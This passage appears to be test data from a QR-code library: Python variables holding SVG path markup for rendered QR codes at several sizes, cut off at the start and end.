L 12 30 L 15 30 L 15 27 z M 51 69 L 51 72 L 54 72 L 54 69 z M 72 27 L 72 30 L 75 30 L 75 27 z M 15 12 L 15 15 L 18 15 L 18 12 z M 12 36 L 12 39 L 15 39 L 15 36 z M 39 51 L 39 54 L 42 54 L 42 51 z M 36 21 L 36 24 L 39 24 L 39 21 z M 24 30 L 24 33 L 27 33 L 27 30 z M 30 15 L 30 18 L 33 18 L 33 15 z M 24 63 L 24 66 L 27 66 L 27 63 z M 
54 48 L 54 51 L 57 51 L 57 48 z M 27 72 L 27 75 L 30 75 L 30 72 z M 48 24 L 48 27 L 51 27 L 51 24 z M 30 72 L 30 75 L 33 75 L 33 72 z M 42 72 L 42 75 L 45 75 L 45 72 z M 45 72 L 45 75 L 48 75 L 48 72 z M 57 39 L 57 42 L 60 42 L 60 39 z M 54 21 L 54 24 L 57 24 L 57 21 z M 51 39 L 51 42 L 54 42 L 54 39 z M 60 72 L 60 75 L 63 75 L 63 72 z M 66 45 L 66 48 L 69 48 L 69 45 z M 12 18 L 12 21 L 15 21 L 15 18 z M 63 63 L 63 66 L 66 66 L 66 63 z M 36 51 L 36 54 L 39 54 L 39 51 z M 24 36 L 24 39 L 27 39 L 27 36 z M 21 12 L 21 15 L 24 15 L 24 12 z M 18 36 L 18 39 L 21 39 L 21 36 z M 39 36 L 39 39 L 42 39 L 42 36 z M 42 57 L 42 60 L 45 60 L 45 57 z M 30 18 L 30 21 L 33 21 L 33 18 z M 39 66 L 39 69 L 42 69 L 42 66 z M 54 39 L 54 42 L 57 42 L 57 39 z M 30 63 L 30 66 L 33 66 L 33 63 z M 48 39 L 48 42 L 51 42 L 51 39 z M 15 72 L 15 75 L 18 75 L 18 72 z M 63 57 L 63 60 L 66 60 L 66 57 z M 60 63 L 60 66 L 63 66 L 63 63 z M 51 48 L 51 51 L 54 51 L 54 48 z M 72 48 L 72 51 L 75 51 L 75 48 z M 48 72 L 48 75 L 51 75 L 51 72 z M 12 57 L 12 60 L 15 60 L 15 57 z M 21 42 L 21 45 L 24 45 L 24 42 z M 15 54 L 15 57 L 18 57 L 18 54 z M 39 45 L 39 48 L 42 48 L 42 45 z M 27 12 L 27 15 L 30 15 L 30 12 z M 21 60 L 21 63 L 24 63 L 24 60 z M 42 12 L 42 15 L 45 15 L 45 12 z M 36 60 L 36 63 L 39 63 L 39 60 z M 30 57 L 30 60 L 33 60 L 33 57 z M 60 45 L 60 48 L 63 48 L 63 45 z M 54 42 L 54 45 L 57 45 L 57 42 z M 30 66 L 30 69 L 33 69 L 33 66 z M 48 54 L 48 57 L 51 57 L 51 54 z M 69 30 L 69 33 L 72 33 L 72 30 z M 66 18 L 66 21 L 69 21 L 69 18 z M 63 42 L 63 45 L 66 45 L 66 42 z M 51 57 L 51 60 L 54 60 L 54 57 z M 72 15 L 72 18 L 75 18 L 75 15 z M 18 72 L 18 75 L 21 75 L 21 72 z M 21 39 L 21 42 L 24 42 L 24 39 z M 18 21 L 18 24 L 21 24 L 21 21 z M 36 33 L 36 36 L 39 36 L 39 33 z M 24 18 L 24 21 L 27 21 L 27 18 z M 18 54 L 18 57 L 21 57 L 21 54 z M 30 27 L 30 30 L 33 30 L 33 27 z M 45 33 L 45 36 L 48 36 L 48 33 z M 42 27 L 42 30 L 45 30 L 45 27 z M 30 36 L 30 39 L 33 39 L 33 36 z M 54 60 L 54 63 L 57 63 L 57 60 z M 69 60 L 69 63 L 72 63 L 72 60 z M 63 12 L 63 15 L 66 15 L 66 12 z M 60 36 L 60 39 L 63 39 L 63 36 z M 12 69 L 12 72 L 15 72 L 15 69 z M 48 69 L 48 72 L 51 72 L 51 69 z M 12 30 L 12 33 L 15 33 L 15 30 z M 57 30 L 57 33 L 60 33 L 60 30 z M 72 30 L 72 33 L 75 33 L 75 30 z M 66 66 L 66 69 L 69 69 L 69 66 z M 21 24 L 21 27 L 24 27 L 24 24 z M 18 24 L 18 27 L 21 27 L 21 24 z M 39 48 L 39 51 L 42 51 L 42 48 z M 36 24 L 36 27 L 39 27 L 39 24 z M 42 45 L 42 48 L 45 48 L 45 45 z M 30 30 L 30 33 L 33 33 L 33 30 z M 27 30 L 27 33 L 30 33 L 30 30 z M 24 66 L 24 69 L 27 69 L 27 66 z M 45 18 L 45 21 L 48 21 L 48 18 z M 42 30 L 42 33 L 45 33 L 45 30 z M 60 18 L 60 21 L 63 21 L 63 18 z M 48 27 L 48 30 L 51 30 L 51 27 z M 63 21 L 63 24 L 66 24 L 66 21 z M 57 36 L 57 39 L 60 39 L 60 36 z M 54 12 L 54 15 L 57 15 L 57 12 z M 12 60 L 12 63 L 15 63 L 15 60 z M 48 60 L 48 63 L 51 63 L 51 60 z M 69 12 L 69 15 L 72 15 L 72 12 z M 66 36 L 66 39 L 69 39 L 69 36 z M 12 21 L 12 24 L 15 24 L 15 21 z M 21 54 L 21 57 L 24 57 L 24 54 z M 24 39 L 24 42 L 27 42 L 27 39 z M 21 21 L 21 24 L 24 24 L 24 21 z M 18 39 L 18 42 L 21 42 L 21 39 z M 39 57 L 39 60 L 42 60 L 42 57 z M 27 48 L 27 51 L 30 51 L 30 48 z M 24 24 L 24 27 L 27 27 L 27 24 z M 21 72 L 21 75 L 24 75 L 24 72 z M 42 48 L 42 51 L 45 51 L 45 48 z M 36 72 L 36 75 L 39 75 L 39 72 z M 30 21 L 30 24 L 33 24 L 33 21 z M 39 63 L 39 66 L 42 66 L 42 63 z M 57 66 L 57 69 L 60 69 L 60 66 z M 54 54 L 54 57 L 57 57 L 57 54 z M 69 42 L 69 45 L 72 45 L 72 42 z M 57 57 L 57 60 L 60 60 L 60 57 z M 51 45 L 51 48 L 54 
48 L 54 45 z M 18 60 L 18 63 L 21 63 L 21 60 z M 12 12 L 12 15 L 15 15 L 15 12 z M 63 69 L 63 72 L 66 72 L 66 69 z M 24 54 L 24 57 L 27 57 L 27 54 z M 42 15 L 42 18 L 45 18 L 45 15 z M 36 63 L 36 66 L 39 66 L 39 63 z M 30 48 L 30 51 L 33 51 L 33 48 z M 54 72 L 54 75 L 57 75 L 57 72 z M 24 72 L 24 75 L 27 75 L 27 72 z M 45 48 L 45 51 L 48 51 L 48 48 z M 69 72 L 69 75 L 72 75 L 72 72 z M 63 24 L 63 27 L 66 27 L 66 24 z M 33 39 L 33 42 L 36 42 L 36 39 z M 57 63 L 57 66 L 60 66 L 60 63 z M 30 69 L 30 72 L 33 72 L 33 69 z M 48 57 L 48 60 L 51 60 L 51 57 z M 66 21 L 66 24 L 69 24 L 69 21 z M 63 39 L 63 42 L 66 42 L 66 39 z M 72 18 L 72 21 L 75 21 L 75 18 z M 66 54 L 66 57 L 69 57 L 69 54 z M 21 36 L 21 39 L 24 39 L 24 36 z M 18 12 L 18 15 L 21 15 L 21 12 z M 24 21 L 24 24 L 27 24 L 27 21 z M 39 27 L 39 30 L 42 30 L 42 27 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
rh = """<svg height="139.2mm" version="1.1" viewBox="0 0 139.2 139.2" width="139.2mm" xmlns="http://www.w3.org/2000/svg"><path d="M 96 48 L 96 52.8 L 100.8 52.8 L 100.8 48 z M 86.4 100.8 L 86.4 105.6 L 91.2 105.6 L 91.2 100.8 z M 76.8 24 L 76.8 28.8 L 81.6 28.8 L 81.6 24 z M 67.2 100.8 L 67.2 105.6 L 72.0 105.6 L 72.0 100.8 z M 19.2 115.2 L 19.2 120.0 L 24.0 120.0 L 24.0 115.2 z M 96 62.4 L 96 67.2 L 100.8 67.2 L 100.8 62.4 z M 86.4 38.4 L 86.4 43.2 L 91.2 43.2 L 91.2 38.4 z M 105.6 38.4 L 105.6 43.2 L 110.4 43.2 L 110.4 38.4 z M 81.6 100.8 L 81.6 105.6 L 86.4 105.6 L 86.4 100.8 z M 24 48 L 24 52.8 L 28.8 52.8 L 28.8 48 z M 19.2 67.2 L 19.2 72.0 L 24.0 72.0 L 24.0 67.2 z M 105.6 110.4 L 105.6 115.2 L 110.4 115.2 L 110.4 110.4 z M 57.6 43.2 L 57.6 48.0 L 62.4 48.0 L 62.4 43.2 z M 43.2 57.6 L 43.2 62.4 L 48.0 62.4 L 48.0 57.6 z M 38.4 19.2 L 38.4 24.0 L 43.2 24.0 L 43.2 19.2 z M 67.2 57.6 L 67.2 62.4 L 72.0 62.4 L 72.0 57.6 z M 62.4 19.2 L 62.4 24.0 L 67.2 24.0 L 67.2 19.2 z M 67.2 52.8 L 67.2 57.6 L 72.0 57.6 L 72.0 52.8 z M 96 33.6 L 96 38.4 L 100.8 38.4 L 100.8 33.6 z M 48 67.2 L 48 72.0 L 52.8 72.0 L 52.8 67.2 z M 76.8 48 L 76.8 52.8 L 81.6 52.8 L 81.6 48 z M 110.4 86.4 L 110.4 91.2 L 115.2 91.2 L 115.2 86.4 z M 100.8 28.8 L 100.8 33.6 L 105.6 33.6 L 105.6 28.8 z M 19.2 100.8 L 19.2 105.6 L 24.0 105.6 L 24.0 100.8 z M 86.4 24 L 86.4 28.8 L 91.2 28.8 L 91.2 24 z M 115.2 62.4 L 115.2 67.2 L 120.0 67.2 L 120.0 62.4 z M 105.6 62.4 L 105.6 67.2 L 110.4 67.2 L 110.4 62.4 z M 19.2 38.4 L 19.2 43.2 L 24.0 43.2 L 24.0 38.4 z M 115.2 38.4 L 115.2 43.2 L 120.0 43.2 L 120.0 38.4 z M 57.6 91.2 L 57.6 96.0 L 62.4 96.0 L 62.4 91.2 z M 38.4 67.2 L 38.4 72.0 L 43.2 72.0 L 43.2 67.2 z M 33.6 28.8 L 33.6 33.6 L 38.4 33.6 L 38.4 28.8 z M 28.8 48 L 28.8 52.8 L 33.6 52.8 L 33.6 48 z M 62.4 86.4 L 62.4 91.2 L 67.2 91.2 L 67.2 86.4 z M 57.6 28.8 L 57.6 33.6 L 62.4 33.6 L 62.4 28.8 z M 48 19.2 L 48 24.0 L 52.8 24.0 L 52.8 19.2 z M 38.4 96 L 38.4 100.8 L 43.2 100.8 L 43.2 96 z M 72 19.2 L 72 24.0 L 76.8 24.0 L 76.8 19.2 z M 62.4 96 L 62.4 100.8 L 67.2 100.8 L 67.2 96 z M 96 19.2 L 96 24.0 L 100.8 24.0 L 100.8 19.2 z M 100.8 81.6 L 100.8 86.4 L 105.6 86.4 L 105.6 81.6 z M 96 110.4 L 96 115.2 L 100.8 115.2 L 100.8 110.4 z M 86.4 28.8 L 86.4 33.6 L 91.2 33.6 L 91.2 28.8 z M 81.6 67.2 L 81.6 72.0 L 86.4 72.0 L 86.4 67.2 z M 28.8 100.8 L 28.8 105.6 L 33.6 105.6 L 33.6 100.8 z M 105.6 67.2 L 105.6 72.0 L 110.4 72.0 L 110.4 67.2 z M 19.2 24 L 19.2 28.8 L 24.0 28.8 L 24.0 24 z M 24 76.8 L 24 81.6 L 28.8 81.6 L 28.8 76.8 z M 57.6 76.8 L 57.6 81.6 L 62.4 81.6 L 62.4 76.8 z M 43.2 86.4 L 43.2 91.2 L 48.0 91.2 L 48.0 86.4 z M 33.6 105.6 L 33.6 110.4 L 38.4 110.4 L 38.4 105.6 z M 57.6 105.6 L 57.6 110.4 L 62.4 110.4 L 62.4 105.6 z M 72 91.2 L 72 96.0 L 76.8 96.0 L 76.8 91.2 z M 62.4 110.4 L 62.4 115.2 L 67.2 115.2 L 67.2 110.4 z M 91.2 96 L 91.2 100.8 L 96.0 100.8 L 96.0 96 z M 86.4 57.6 L 86.4 62.4 L 91.2 62.4 L 91.2 57.6 z M 48 96 L 48 100.8 L 52.8 100.8 L 52.8 96 z M 76.8 57.6 L 76.8 62.4 L 81.6 62.4 L 81.6 57.6 z M 115.2 96 L 115.2 100.8 L 120.0 100.8 L 120.0 96 z M 105.6 19.2 L 105.6 24.0 L 110.4 24.0 L 110.4 19.2 z M 100.8 57.6 L 100.8 62.4 L 105.6 62.4 L 105.6 57.6 z M 115.2 33.6 L 115.2 38.4 L 120.0 38.4 L 120.0 33.6 z M 28.8 105.6 L 28.8 110.4 L 33.6 110.4 L 33.6 105.6 z M 105.6 91.2 L 105.6 96.0 L 110.4 96.0 L 110.4 91.2 z M 19.2 86.4 L 19.2 91.2 L 24.0 91.2 L 24.0 86.4 z M 28.8 76.8 L 28.8 81.6 L 33.6 81.6 L 33.6 76.8 z M 33.6 100.8 L 33.6 105.6 L 38.4 105.6 L 38.4 100.8 z M 48 86.4 L 48 91.2 L 52.8 91.2 L 52.8 
86.4 z M 72 67.2 L 72 72.0 L 76.8 72.0 L 76.8 67.2 z M 100.8 48 L 100.8 52.8 L 105.6 52.8 L 105.6 48 z M 86.4 43.2 L 86.4 48.0 L 91.2 48.0 L 91.2 43.2 z M 76.8 81.6 L 76.8 86.4 L 81.6 86.4 L 81.6 81.6 z M 100.8 72 L 100.8 76.8 L 105.6 76.8 L 105.6 72 z M 91.2 19.2 L 91.2 24.0 L 96.0 24.0 L 96.0 19.2 z M 115.2 19.2 L 115.2 24.0 L 120.0 24.0 L 120.0 19.2 z M 19.2 72 L 19.2 76.8 L 24.0 76.8 L 24.0 72 z M 33.6 48 L 33.6 52.8 L 38.4 52.8 L 38.4 48 z M 28.8 28.8 L 28.8 33.6 L 33.6 33.6 L 33.6 28.8 z M 24 67.2 L 24 72.0 L 28.8 72.0 L 28.8 67.2 z M 57.6 48 L 57.6 52.8 L 62.4 52.8 L 62.4 48 z M 62.4 52.8 L 62.4 57.6 L 67.2 57.6 L 67.2 52.8 z M 48 38.4 L 48 43.2 L 52.8 43.2 L 52.8 38.4 z M 72 38.4 L 72 43.2 L 76.8 43.2 L 76.8 38.4 z M 67.2 38.4 L 67.2 43.2 L 72.0 43.2 L 72.0 38.4 z M 62.4 115.2 L 62.4 120.0 L 67.2 120.0 L 67.2 115.2 z M 96 38.4 L 96 43.2 L 100.8 43.2 L 100.8 38.4 z M 76.8 52.8 L 76.8 57.6 L 81.6 57.6 L 81.6 52.8 z M 19.2 105.6 L 19.2 110.4 L 24.0 110.4 L 24.0 105.6 z M 86.4 48 L 86.4 52.8 L 91.2 52.8 L 91.2 48 z M 76.8 105.6 L 76.8 110.4 L 81.6 110.4 L 81.6 105.6 z M 105.6 48 L 105.6 52.8 L 110.4 52.8 L 110.4 48 z M 19.2 43.2 L 19.2 48.0 L 24.0 48.0 L 24.0 43.2 z M 81.6 110.4 L 81.6 115.2 L 86.4 115.2 L 86.4 110.4 z M 115.2 43.2 L 115.2 48.0 L 120.0 48.0 L 120.0 43.2 z M 24 19.2 L 24 24.0 L 28.8 24.0 L 28.8 19.2 z M 19.2 57.6 L 19.2 62.4 L 24.0 62.4 L 24.0 57.6 z M 62.4 81.6 L 62.4 86.4 L 67.2 86.4 L 67.2 81.6 z M 57.6 33.6 L 57.6 38.4 L 62.4 38.4 L 62.4 33.6 z M 38.4 48 L 38.4 52.8 L 43.2 52.8 L 43.2 48 z M 48 24 L 48 28.8 L 52.8 28.8 L 52.8 24 z M 38.4 100.8 L 38.4 105.6 L 43.2 105.6 L 43.2 100.8 z M 86.4 76.8 L 86.4 81.6 L 91.2 81.6 L 91.2 76.8 z M 43.2 115.2 L 43.2 120.0 L 48.0 120.0 L 48.0 115.2 z M 76.8 38.4 L 76.8 43.2 L 81.6 43.2 L 81.6 38.4 z M 48 115.2 L 48 120.0 L 52.8 120.0 L 52.8 115.2 z M 67.2 115.2 L 67.2 120.0 L 72.0 120.0 L 72.0 115.2 z M 72 115.2 L 72 120.0 L 76.8 120.0 L 76.8 115.2 z M 91.2 62.4 L 91.2 67.2 L 96.0 67.2 L 96.0 62.4 z M 86.4 33.6 L 86.4 38.4 L 91.2 38.4 L 91.2 33.6 z M 81.6 62.4 L 81.6 67.2 L 86.4 67.2 L 86.4 62.4 z M 96 115.2 L 96 120.0 L 100.8 120.0 L 100.8 115.2 z M 105.6 72 L 105.6 76.8 L 110.4 76.8 L 110.4 72 z M 19.2 28.8 L 19.2 33.6 L 24.0 33.6 L 24.0 28.8 z M 100.8 100.8 L 100.8 105.6 L 105.6 105.6 L 105.6 100.8 z M 57.6 81.6 L 57.6 86.4 L 62.4 86.4 L 62.4 81.6 z M 38.4 57.6 L 38.4 62.4 L 43.2 62.4 L 43.2 57.6 z M 33.6 19.2 L 33.6 24.0 L 38.4 24.0 L 38.4 19.2 z M 28.8 57.6 L 28.8 62.4 L 33.6 62.4 L 33.6 57.6 z M 62.4 57.6 L 62.4 62.4 L 67.2 62.4 L 67.2 57.6 z M 67.2 91.2 L 67.2 96.0 L 72.0 96.0 L 72.0 91.2 z M 48 28.8 L 48 33.6 L 52.8 33.6 L 52.8 28.8 z M 62.4 105.6 L 62.4 110.4 L 67.2 110.4 L 67.2 105.6 z M 86.4 62.4 L 86.4 67.2 L 91.2 67.2 L 91.2 62.4 z M 48 100.8 L 48 105.6 L 52.8 105.6 L 52.8 100.8 z M 76.8 62.4 L 76.8 67.2 L 81.6 67.2 L 81.6 62.4 z M 24 115.2 L 24 120.0 L 28.8 120.0 L 28.8 115.2 z M 100.8 91.2 L 100.8 96.0 L 105.6 96.0 L 105.6 91.2 z M 96 100.8 L 96 105.6 L 100.8 105.6 L 100.8 100.8 z M 81.6 76.8 L 81.6 81.6 L 86.4 81.6 L 86.4 76.8 z M 115.2 76.8 L 115.2 81.6 L 120.0 81.6 L 120.0 76.8 z M 76.8 115.2 L 76.8 120.0 L 81.6 120.0 L 81.6 115.2 z M 19.2 91.2 L 19.2 96.0 L 24.0 96.0 L 24.0 91.2 z M 33.6 67.2 L 33.6 72.0 L 38.4 72.0 L 38.4 67.2 z M 24 86.4 L 24 91.2 L 28.8 91.2 L 28.8 86.4 z M 62.4 72 L 62.4 76.8 L 67.2 76.8 L 67.2 72 z M 43.2 19.2 L 43.2 24.0 L 48.0 24.0 L 48.0 19.2 z M 33.6 96 L 33.6 100.8 L 38.4 100.8 L 38.4 96 z M 67.2 19.2 L 67.2 24.0 L 72.0 24.0 L 72.0 19.2 z M 57.6 96 L 57.6 100.8 L 62.4 100.8 L 62.4 96 z 
M 48 91.2 L 48 96.0 L 52.8 96.0 L 52.8 91.2 z M 96 72 L 96 76.8 L 100.8 76.8 L 100.8 72 z M 86.4 67.2 L 86.4 72.0 L 91.2 72.0 L 91.2 67.2 z M 48 105.6 L 48 110.4 L 52.8 110.4 L 52.8 105.6 z M 76.8 86.4 L 76.8 91.2 L 81.6 91.2 L 81.6 86.4 z M 110.4 48 L 110.4 52.8 L 115.2 52.8 L 115.2 48 z M 105.6 28.8 L 105.6 33.6 L 110.4 33.6 L 110.4 28.8 z M 100.8 67.2 L 100.8 72.0 L 105.6 72.0 L 105.6 67.2 z M 81.6 91.2 L 81.6 96.0 L 86.4 96.0 L 86.4 91.2 z M 115.2 24 L 115.2 28.8 L 120.0 28.8 L 120.0 24 z M 28.8 115.2 L 28.8 120.0 L 33.6 120.0 L 33.6 115.2 z M 33.6 62.4 L 33.6 67.2 L 38.4 67.2 L 38.4 62.4 z M 28.8 33.6 L 28.8 38.4 L 33.6 38.4 L 33.6 33.6 z M 57.6 52.8 L 57.6 57.6 L 62.4 57.6 L 62.4 52.8 z M 38.4 28.8 L 38.4 33.6 L 43.2 33.6 L 43.2 28.8 z M 28.8 86.4 L 28.8 91.2 L 33.6 91.2 L 33.6 86.4 z M 48 43.2 L 48 48.0 L 52.8 48.0 L 52.8 43.2 z M 72 52.8 L 72 57.6 L 76.8 57.6 L 76.8 52.8 z M 67.2 43.2 L 67.2 48.0 L 72.0 48.0 L 72.0 43.2 z M 48 57.6 L 48 62.4 L 52.8 62.4 L 52.8 57.6 z M 86.4 96 L 86.4 100.8 L 91.2 100.8 L 91.2 96 z M 110.4 96 L 110.4 100.8 L 115.2 100.8 L 115.2 96 z M 100.8 19.2 L 100.8 24.0 L 105.6 24.0 L 105.6 19.2 z M 96 57.6 L 96 62.4 L 100.8 62.4 L 100.8 57.6 z M 19.2 110.4 L 19.2 115.2 L 24.0 115.2 L 24.0 110.4 z M 76.8 110.4 L 76.8 115.2 L 81.6 115.2 L 81.6 110.4 z M 19.2 48 L 19.2 52.8 L 24.0 52.8 L 24.0 48 z M 91.2 48 L 91.2 52.8 L 96.0 52.8 L 96.0 48 z M 115.2 48 L 115.2 52.8 L 120.0 52.8 L 120.0 48 z M 105.6 105.6 L 105.6 110.4 L 110.4 110.4 L 110.4 105.6 z M 33.6 38.4 L 33.6 43.2 L 38.4 43.2 L 38.4 38.4 z M 28.8 38.4 L 28.8 43.2 L 33.6 43.2 L 33.6 38.4 z M 62.4 76.8 L 62.4 81.6 L 67.2 81.6 L 67.2 76.8 z M 57.6 38.4 L 57.6 43.2 L 62.4 43.2 L 62.4 38.4 z M 67.2 72 L 67.2 76.8 L 72.0 76.8 L 72.0 72 z M 48 48 L 48 52.8 L 52.8 52.8 L 52.8 48 z M 43.2 48 L 43.2 52.8 L 48.0 52.8 L 48.0 48 z M 38.4 105.6 L 38.4 110.4 L 43.2 110.4 L 43.2 105.6 z M 72 28.8 L 72 33.6 L 76.8 33.6 L 76.8 28.8 z M 67.2 48 L 67.2 52.8 L 72.0 52.8 L 72.0 48 z M 96 28.8 L 96 33.6 L 100.8 33.6 L 100.8 28.8 z M 76.8 43.2 L 76.8 48.0 L 81.6 48.0 L 81.6 43.2 z M 100.8 33.6 L 100.8 38.4 L 105.6 38.4 L 105.6 33.6 z M 91.2 57.6 L 91.2 62.4 L 96.0 62.4 L 96.0 57.6 z M 86.4 19.2 L 86.4 24.0 L 91.2 24.0 L 91.2 19.2 z M 19.2 96 L 19.2 100.8 L 24.0 100.8 L 24.0 96 z M 76.8 96 L 76.8 100.8 L 81.6 100.8 L 81.6 96 z M 110.4 19.2 L 110.4 24.0 L 115.2 24.0 L 115.2 19.2 z M 105.6 57.6 L 105.6 62.4 L 110.4 62.4 L 110.4 57.6 z M 19.2 33.6 L 19.2 38.4 L 24.0 38.4 L 24.0 33.6 z M 33.6 86.4 L 33.6 91.2 L 38.4 91.2 L 38.4 86.4 z M 38.4 62.4 L 38.4 67.2 L 43.2 67.2 L 43.2 62.4 z M 33.6 33.6 L 33.6 38.4 L 38.4 38.4 L 38.4 33.6 z M 28.8 62.4 L 28.8 67.2 L 33.6 67.2 L 33.6 62.4 z M 62.4 91.2 L 62.4 96.0 L 67.2 96.0 L 67.2 91.2 z M 43.2 76.8 L 43.2 81.6 L 48.0 81.6 L 48.0 76.8 z M 38.4 38.4 L 38.4 43.2 L 43.2 43.2 L 43.2 38.4 z M 33.6 115.2 L 33.6 120.0 L 38.4 120.0 L 38.4 115.2 z M 67.2 76.8 L 67.2 81.6 L 72.0 81.6 L 72.0 76.8 z M 57.6 115.2 L 57.6 120.0 L 62.4 120.0 L 62.4 115.2 z M 48 33.6 L 48 38.4 L 52.8 38.4 L 52.8 33.6 z M 62.4 100.8 L 62.4 105.6 L 67.2 105.6 L 67.2 100.8 z M 91.2 105.6 L 91.2 110.4 L 96.0 110.4 L 96.0 105.6 z M 86.4 86.4 L 86.4 91.2 L 91.2 91.2 L 91.2 86.4 z M 110.4 67.2 L 110.4 72.0 L 115.2 72.0 L 115.2 67.2 z M 91.2 91.2 L 91.2 96.0 L 96.0 96.0 L 96.0 91.2 z M 81.6 72 L 81.6 76.8 L 86.4 76.8 L 86.4 72 z M 28.8 96 L 28.8 100.8 L 33.6 100.8 L 33.6 96 z M 19.2 19.2 L 19.2 24.0 L 24.0 24.0 L 24.0 19.2 z M 100.8 110.4 L 100.8 115.2 L 105.6 115.2 L 105.6 110.4 z M 38.4 86.4 L 38.4 91.2 L 43.2 91.2 L 43.2 86.4 z 
M 67.2 24 L 67.2 28.8 L 72.0 28.8 L 72.0 24 z M 57.6 100.8 L 57.6 105.6 L 62.4 105.6 L 62.4 100.8 z M 48 76.8 L 48 81.6 L 52.8 81.6 L 52.8 76.8 z M 86.4 115.2 L 86.4 120.0 L 91.2 120.0 L 91.2 115.2 z M 38.4 115.2 L 38.4 120.0 L 43.2 120.0 L 43.2 115.2 z M 72 76.8 L 72 81.6 L 76.8 81.6 L 76.8 76.8 z M 110.4 115.2 L 110.4 120.0 L 115.2 120.0 L 115.2 115.2 z M 100.8 38.4 L 100.8 43.2 L 105.6 43.2 L 105.6 38.4 z M 52.8 62.4 L 52.8 67.2 L 57.6 67.2 L 57.6 62.4 z M 91.2 100.8 L 91.2 105.6 L 96.0 105.6 L 96.0 100.8 z M 48 110.4 L 48 115.2 L 52.8 115.2 L 52.8 110.4 z M 76.8 91.2 L 76.8 96.0 L 81.6 96.0 L 81.6 91.2 z M 105.6 33.6 L 105.6 38.4 L 110.4 38.4 L 110.4 33.6 z M 100.8 62.4 L 100.8 67.2 L 105.6 67.2 L 105.6 62.4 z M 115.2 28.8 L 115.2 33.6 L 120.0 33.6 L 120.0 28.8 z M 105.6 86.4 L 105.6 91.2 L 110.4 91.2 L 110.4 86.4 z M 33.6 57.6 L 33.6 62.4 L 38.4 62.4 L 38.4 57.6 z M 28.8 19.2 L 28.8 24.0 L 33.6 24.0 L 33.6 19.2 z M 38.4 33.6 L 38.4 38.4 L 43.2 38.4 L 43.2 33.6 z M 62.4 43.2 L 62.4 48.0 L 67.2 48.0 L 67.2 43.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
r6 = rt
r8 = """<svg height="23.2mm" version="1.1" viewBox="0 0 23.2 23.2" width="23.2mm" xmlns="http://www.w3.org/2000/svg"><path d="M 16 8 L 16 8.8 L 16.8 8.8 L 16.8 8 z M 14.4 16.8 L 14.4 17.6 L 15.2 17.6 L 15.2 16.8 z M 12.8 4 L 12.8 4.8 L 13.6 4.8 L 13.6 4 z M 11.2 16.8 L 11.2 17.6 L 12.0 17.6 L 12.0 16.8 z M 3.2 19.2 L 3.2 20.0 L 4.0 20.0 L 4.0 19.2 z M 16 10.4 L 16 11.2 L 16.8 11.2 L 16.8 10.4 z M 14.4 6.4 L 14.4 7.2 L 15.2 7.2 L 15.2 6.4 z M 17.6 6.4 L 17.6 7.2 L 18.4 7.2 L 18.4 6.4 z M 13.6 16.8 L 13.6 17.6 L 14.4 17.6 L 14.4 16.8 z M 4 8 L 4 8.8 L 4.8 8.8 L 4.8 8 z M 3.2 11.2 L 3.2 12.0 L 4.0 12.0 L 4.0 11.2 z M 17.6 18.4 L 17.6 19.2 L 18.4 19.2 L 18.4 18.4 z M 9.6 7.2 L 9.6 8.0 L 10.4 8.0 L 10.4 7.2 z M 7.2 9.6 L 7.2 10.4 L 8.0 10.4 L 8.0 9.6 z M 6.4 3.2 L 6.4 4.0 L 7.2 4.0 L 7.2 3.2 z M 11.2 9.6 L 11.2 10.4 L 12.0 10.4 L 12.0 9.6 z M 10.4 3.2 L 10.4 4.0 L 11.2 4.0 L 11.2 3.2 z M 11.2 8.8 L 11.2 9.6 L 12.0 9.6 L 12.0 8.8 z M 16 5.6 L 16 6.4 L 16.8 6.4 L 16.8 5.6 z M 8 11.2 L 8 12.0 L 8.8 12.0 L 8.8 11.2 z M 12.8 8 L 12.8 8.8 L 13.6 8.8 L 13.6 8 z M 18.4 14.4 L 18.4 15.2 L 19.2 15.2 L 19.2 14.4 z M 16.8 4.8 L 16.8 5.6 L 17.6 5.6 L 17.6 4.8 z M 3.2 16.8 L 3.2 17.6 L 4.0 17.6 L 4.0 16.8 z M 14.4 4 L 14.4 4.8 L 15.2 4.8 L 15.2 4 z M 19.2 10.4 L 19.2 11.2 L 20.0 11.2 L 20.0 10.4 z M 17.6 10.4 L 17.6 11.2 L 18.4 11.2 L 18.4 10.4 z M 3.2 6.4 L 3.2 7.2 L 4.0 7.2 L 4.0 6.4 z M 19.2 6.4 L 19.2 7.2 L 20.0 7.2 L 20.0 6.4 z M 9.6 15.2 L 9.6 16.0 L 10.4 16.0 L 10.4 15.2 z M 6.4 11.2 L 6.4 12.0 L 7.2 12.0 L 7.2 11.2 z M 5.6 4.8 L 5.6 5.6 L 6.4 5.6 L 6.4 4.8 z M 4.8 8 L 4.8 8.8 L 5.6 8.8 L 5.6 8 z M 10.4 14.4 L 10.4 15.2 L 11.2 15.2 L 11.2 14.4 z M 9.6 4.8 L 9.6 5.6 L 10.4 5.6 L 10.4 4.8 z M 8 3.2 L 8 4.0 L 8.8 4.0 L 8.8 3.2 z M 6.4 16 L 6.4 16.8 L 7.2 16.8 L 7.2 16 z M 12 3.2 L 12 4.0 L 12.8 4.0 L 12.8 3.2 z M 10.4 16 L 10.4 16.8 L 11.2 16.8 L 11.2 16 z M 16 3.2 L 16 4.0 L 16.8 4.0 L 16.8 3.2 z M 16.8 13.6 L 16.8 14.4 L 17.6 14.4 L 17.6 13.6 z M 16 18.4 L 16 19.2 L 16.8 19.2 L 16.8 18.4 z M 14.4 4.8 L 14.4 5.6 L 15.2 5.6 L 15.2 4.8 z M 13.6 11.2 L 13.6 12.0 L 14.4 12.0 L 14.4 11.2 z M 4.8 16.8 L 4.8 17.6 L 5.6 17.6 L 5.6 16.8 z M 17.6 11.2 L 17.6 12.0 L 18.4 12.0 L 18.4 11.2 z M 3.2 4 L 3.2 4.8 L 4.0 4.8 L 4.0 4 z M 4 12.8 L 4 13.6 L 4.8 13.6 L 4.8 12.8 z M 9.6 12.8 L 9.6 13.6 L 10.4 13.6 L 10.4 12.8 z M 7.2 14.4 L 7.2 15.2 L 8.0 15.2 L 8.0 14.4 z M 5.6 17.6 L 5.6 18.4 L 6.4 18.4 L 6.4 17.6 z M 9.6 17.6 L 9.6 18.4 L 10.4 18.4 L 10.4 17.6 z M 12 15.2 L 12 16.0 L 12.8 16.0 L 12.8 15.2 z M 10.4 18.4 L 10.4 19.2 L 11.2 19.2 L 11.2 18.4 z M 15.2 16 L 15.2 16.8 L 16.0 16.8 L 16.0 16 z M 14.4 